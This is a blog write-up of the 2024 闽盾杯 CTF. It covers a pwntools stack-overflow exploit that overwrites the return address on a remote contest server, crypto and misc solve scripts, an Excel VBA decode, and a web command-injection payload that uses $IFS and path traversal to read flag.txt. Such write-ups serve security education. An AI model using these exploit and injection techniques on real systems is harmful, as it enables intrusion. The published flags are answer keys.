CTF WriteUp

2024闽盾杯WriteUp

Posted by Zephyr on Sunday, June 23, 2024

Pwn

licensePWN

挖个漏洞获取管理员的权限和数据

fscanf(v1, "%s", v6);

存在栈溢出,进到 sub_4012F0 函数中eip可控,题目中要求

if ( v3 == 999 )
    sub_401340();
  return 0;

没开pie,把后门函数地址 401340 塞eip里然后拿到flag

from pwn import *
p = remote("112.50.92.5",12523)
context.log_level = "debug"
back_addr = 0x401340
# payload = (b"a" * len("aaaaaaaaaaaaaaaaaaaaaaaaaaaa")  + p32(back_addr))
# # 打开文件,以二进制写入模式
# with open("license.txt", "wb") as file:
#     # 写入前面的 'a' 字符
#     file.write(b'a' * len("aaaaaaaaaaaaaaaaaaaaaaaaaaaa"))
    
#     # 写入特定的字节序列 40 13 40 00
#     file.write(b'\x40\x13\x40\x00')

# print("Payload 已写入到 license.txt 文件中")

# 读取文件内容并转换为十六进制字符串
with open("license.txt", "rb") as file:
    file_content = file.read()
    hex_payload = file_content.hex()

print(hex_payload)
p.sendlineafter("Send me a license file(Hex string):",hex_payload)
p.interactive()

Crypto

签到题

SM3加密 a88a5d3b7c7721d307a29c0d959950ac921ac7da00a436c6faad3b94e16615c5

我的进制我做主

对文件字符串去重 ergdgjboglfpgcbpbofmgafhfngpfoflfpfkgjgccndcfqfpgcgofofpdadadagr

得到 fgpdocabrjlnemhkq

然后减去 a

得到关系表,比如这里f在字母表顺序中就是5,然后将原始的字符串转换一下,再两两为一组按照18进制解码即可。

18进制想不到的话可以用爆破的方法来求解,直至能解出来为止。

{'f': 5,
 'g': 6,
 'p': 15,
 'd': 3,
 'o': 14,
 'c': 2,
 'a': 0,
 'b': 1,
 'r': 17,
 'j': 9,
 'l': 11,
 'n': 13,
 'e': 4,
 'm': 12,
 'h': 7,
 'k': 10,
 'q': 16}

然后将字符串两两一组

c = "fgpdocabrjlnemhkq"
ci = "ergdgjboglfpgcbpbofmgafhfngpfoflfpfkgjgccndcfqfpgcgofofpdadadagr"

diction = {char: ord(char) - ord('a') for char in c}

blocks = [ci[i:i+2] for i in range(0, len(ci), 2)]

res = ''.join(
    chr(diction[high] * 18 + diction[low])
    for high, low in blocks
)

print(res)

You win! flag{heidun18jinzhi666}

MISC

用Stegsolveb0通道可以看到flag{zhss_c79a_Ccp7_4Zc9}

学会Office

写pandas

# 读取Excel文件
file_path = '学生考试成绩单.xls'  # 替换为你的Excel文件路径
excel_data = pd.read_excel(file_path, None)  # 读取所有sheet

# 遍历所有sheet并打印内容
for sheet_name, sheet_data in excel_data.items():
    print(f"Sheet: {sheet_name}")
    print(sheet_data)

有隐藏列

全选之后 在格式里面取消隐藏列 得到f1ag

得到如下字符串 iojm~qmlfklvhxdqjxdehlvlptmjlldsdggwllhmqlq€ljqmqjrqddjfnddqlvrxeloh

Sub jiemi()
    Dim x As Long, data As String, tmp As String
    For x = 3 To 99
        data = Trim(ActiveSheet.Range("I" & x))
        If data = "" Then Exit For
        tmp = Left(data, 1)
        data = Right(data, Len(data) - 1)
        ActiveSheet.Range("I" & x) = Chr(Asc(tmp) - 3) & data
    Next x
    MsgBox "完成,请查看该列内容!"
End Sub

解密之后,按照计算机降序排列

解密,然后按计算机成绩降序排列

Web

你懂fuzz吗

arjun爆破参数,发现参数word,用burpsuite爆破值。 alt text

换成get方法继续用arjun爆破,参数为key,用$IFS绕过空格过滤 然后?key=cat$IFS../../../../../flag.txt

CATALOG
    FEATURED TAGS
    course crypto ctf notebook pwn writeup 统计学习